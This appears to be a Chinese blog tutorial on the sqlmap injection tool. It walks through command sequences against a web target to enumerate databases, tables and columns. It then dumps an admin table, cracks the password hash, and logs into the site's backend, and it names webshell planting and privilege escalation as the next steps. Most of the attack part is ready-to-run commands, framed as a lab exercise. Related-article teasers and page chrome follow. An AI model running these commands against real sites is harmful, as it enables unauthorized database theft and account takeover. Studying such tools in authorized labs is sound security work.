sqlmap 使用教程

最新推荐文章于 2026-04-21 09:51:58 发布
原创 最新推荐文章于 2026-04-21 09:51:58 发布 · 1.7k 阅读 · 26 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文提供了一个使用sqlmap进行SQL注入的详细教程,包括检查注入点、爆库、爆表、爆字段等步骤,并通过实例演示了如何利用sqlmap获取数据库信息、表名和字段名,最终成功登陆后台。

检查注入点:

sqlmap -u http://aa.com/star_photo.php?artist_id=11

爆所有数据库信息:

sqlmap -u http://aa.com/star_photo.php?artist_id=11 --dbs

爆当前数据库信息:

sqlmap -u http://aa.com/star_photo.php?artist_id=11 --current-db

指定库名列出所有表

sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 --tables

'vhost48330' 为指定数据库名称

指定库名表名列出所有字段

sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns
'admin' 为指定表名称

指定库名表名字段dump出指定字段

sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump
'ac,id,password' 为指定字段名称

实验目的:

学会使用sqlmap并完成一次sql注入。

实验工具:

sqlmap、火狐浏览器
实验环境:

服务器一台(Windows server 2003)
客户机一台(Windows server 2003)、目标地址:http://aa.com/wcms/show.php?id=33

实验步骤:

python.exe sqlmap/sqlmap.py -u http://aa.com/wcms/show.php?id=3

 

image.png

 

image.png

  • 第三步:获取数据库信息。

python.exe sqlmap/sqlmap.py -u http://aa.com/wcms/show.php?id=3 --dbs

获取所有数据库信息

 

image.png

 

image.png

获取当前数据库信息

由于靶机环境搭建了不同的网站和应用,用的都是同一个数据库,因此显示的会把整个mysql的所有数据库名都显示出来。目标网站用的是cms这个库。
第四步:指定库名列出所有表

 

image.png

进一步获取到了cms库所有的表,我们更关注cms_users这个表。根据经验,这里面存储着后台的管理账号和密码。

 

image.png

 

 

image.png

  • 第五步:指定库名表名列出所有字段。

-python.exe sqlmap/sqlmap.py -u http://aa.com/wcms/show.php?id=3 -D cms -T cms_users --columns

 

image.png

 

 

image.png

查出了3个字段,password,userid,username。理论上password、和username分别存储着密码和用户名。

  • 第六步:指定库名表名字段列出指定字段

python.exe sqlmap/sqlmap.py -u http://aa.com/wcms/show.php?id=3 -D cms -T cms_users -C username,password --dump

 

image.png

 

 

image.png

在执行过程中,会需要我们属于选择一下y或者n,默认的是大写选项,默认即可(一直按Enter键即可);主要是sqlmap调用本地字典库进行简单的md5暴力破解。我们最后获取到了用户名和密码,分别是 admin 和123456。
第七步:在后台登陆一下。至于后台的查找,我们可以通过御剑这款专业的后台查找工具,后续实验中会有详细的介绍,这里不再赘述。

http://aa.com/wcms/admin/login.php

输入用户名和密码 admin 123456

登陆成功。
关于sqlmap的入侵整个实验过程已经结束,后续的工作就是挂马提权,这些内容也会在后续的实验中进行详细的介绍。

sqlmap 详细教程

GojoSatoru5
关注
sqlmap使用教程
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
Sqlmap 使用方法小结
0verWatch的博客
08-02 2万+
平常的使用GET方法像–tables –columns -T -D –dbs –dump 啥的就不说了,只是博客几天不发,空着不好,还是得写写东西 --is-dba 当前用户权限(是否为root权限,mssql下最高权限为sa) --dbs 所有数据库 --current-db 网站当前数据库 --users 所有数据库用户 --current-user 当前数据库用户 --random-age...
渗透测试必备:SQLmap 超详细使用指南,SQL 注入从入门到精通
最新发布
m0_56146626的博客
04-21 833
SQLmap是一款开源的渗透测试工具,主要用于检测和利用SQL注入漏洞。本文介绍了SQLmap的下载安装方法,包括Windows系统的配置步骤,以及基本使用方法和参数详解。SQLmap支持多种目标检测方式,可以通过URL、文件或代理日志获取目标,并提供丰富的请求设置、优化和注入选项。工具还包含探测等级、指纹识别、数据枚举等功能,能够获取数据库信息、表结构和内容。使用时需注意风险等级设置,避免对业务系统造成损害。通过合理配置参数,SQLmap能有效检测SQL注入漏洞并获取数据库敏感信息。
sqlmap详细使用教程
m0_55854679的博客
12-28 1万+
文章目录简介SQL注入流程命令参数拓展 简介 Sqlmap是一个自动化检测和利用SQL注入漏洞的免费开源工具,对SQL注入漏洞进行检测的最佳工具 支持对多种数据库进行注入测试,能够自动识别数据库类型并注入 支持多种注入技术,并且能够自动探测使用合适的注入技术 如:布尔盲注、时间盲注、联合查询注入、报错注入、堆查询注入 能够爆破数据库信息,如用户名,密码 能够自动识别哈希密码,并且使用密码字典进行破解. SQL注入 原理:SQL注入攻击指的是用户输入了特殊的数据拼接到原本程序的代码中
SQLmap使用教程图文教程(超详细)
wangyuxiang946的博客
06-20 7万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
shanguicsdn111的博客
09-10 4万+
提示:SQLmap不能直接「扫描」网站漏洞,先用其他扫描工具扫出注入点,再用SQLmap验证并「利用」注入点。检测「post请求」的注入点,使用BP等工具「抓包」,将http请求内容保存到txt文件中。参数,指定需要检测的url,单/双引号包裹。风险级别(0~3,默认1,常用1),级别提高会增加数据被篡改的风险。搜索数据库中是否存在指定库/表/字段,需要指定库名/表名/字段名。就是 all 的意思,获取所有能获取的内容,会消耗很长时间。指定目标「数据库」,单/双引号包裹,常配合其他参数使用
Sqlmap使用教程
wrjhs的博客
04-15 2687
SQLMap是一款自动化SQL注入工具,支持检测和利用多种数据库(如MySQL、Oracle、SQL Server等)的注入漏洞,能够获取数据库信息、文件系统访问权限甚至执行操作系统命令。自动化检测注入点:自动识别GET/POST参数、Cookie等位置的注入漏洞。数据提取:获取数据库名、表、字段及数据。绕过WAF:通过篡改脚本绕过Web应用防火墙的检测。操作系统交互:获取Shell权限或执行远程命令。
SQLmap简单的使用——新手教程解析
m0_52027565的博客
10-11 2725
SQLmap简单的使用——新手教程解析 你好哇!今天给大家介绍一款白帽子工具。他就是号称"数据库的克星"——SQLmapSQLmap解析学习须知:一、sqlmap的安装与操作?(window与linux)1.windows版2.linux版二、使用步骤1.简单的探测WAF2.初步学习的使用sqlmap命令3.简单的使用tamper脚本绕过WAF补充:宽字节注入: 学习须知: 在21世纪的网络空间中,各大互联网巨头通过各种数据库泄露情报的事件都屡见不鲜。我们如何才能很完美的保护我们的数据不被泄呢?这
sqlmap的安装教程
zhongcui8067的博客
05-24 6万+
原文地址:http://www.ckhl8.com/jsjc/217.html由于SQLMap是利用Python语言写的,所以需要将Python这个语言环境给安装上,以下是详细安装过程:准备工作:(1) Python2.7.11;(2) SQLMapStep1. Python2.7.11下载:下载地址:https://www.python.org/downloads/Step2. Python...
Sqlmap使用教程【个人笔记精华整理】
热门推荐
TT小子的博客
08-28 8万+
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 教程说明 学习sqlmap前,建议了解SQL注入实现原理与基本的手工注入操作,更易于理解sqlmap使用。 我的另一个笔记整理:可能是网...
安全圈最被低估的10个神器:一个比一个强大,大佬都在偷偷用!零基础入门到精通,看这篇就够了!赶紧收藏!
baimao__Ch的博客
02-14 3893
这些冷门的网络安全工具是你工具箱中的强大补充,它们提供了独特的功能,覆盖从侦察到漏洞利用的多个环节。虽然像 Nmap 和 Burp Suite 这样的工具不可或缺,但探索像 CyberChef、BloodHound 和 Impacket 这样的“宝藏工具”能让你在网络安全工作中更加高效和灵活。
超详细SQLMap使用攻略及技巧
喜欢Python编程的程序员柚柚呀
12-20 6187
sqlmap支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。sqlmap支持五种不同的注入模式:l 基于布尔的盲注,即可以根据返回页面判断条件真假的注入;l 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;
【SQL注入】Sqlmap使用指南(手把手保姆版)持续更新
开水的博客
03-15 6万+
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
SQLMAP使用
m0_58001548的博客
04-03 4227
SQLmap 是一款用来检测与利用 SQL 注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。官方网站下载 http://sqlmap.org/
sqlmap全套使用教程
weixin_44717303的博客
05-26 1841
sqlmap全套使用教程实验环境sqlmap常见指令命令使用篇实战篇布尔盲注/时间盲注-r 实验环境 windows10+python3.9+sqlmap+sqli2 sqlmap常见指令 sqlmap常用参数: 目标:必须得有 -u : 指定目标URL,sql注入点 请求: 这些选项可用于指定如何连接到目标URL –data=DATA 数据字符串通过POST发送 –cookie=“COOKIE” HTTP Cookie的值 –random-agent 随机选择 HTTP User-Agent 头的值 –p
sqlmap的安装及使用教程_sqlmap安装使用教程
2401_84281648的博客
05-17 1428
除此之外,还可以查询更多数据,如当前的数据库版本、当前的数据库用户、数据库密码等,可以使用不同的命令执行不同的操作。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。然后右键这个快捷方式,点击属性,将起始位置改为你的sqlmap目录,点击确定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值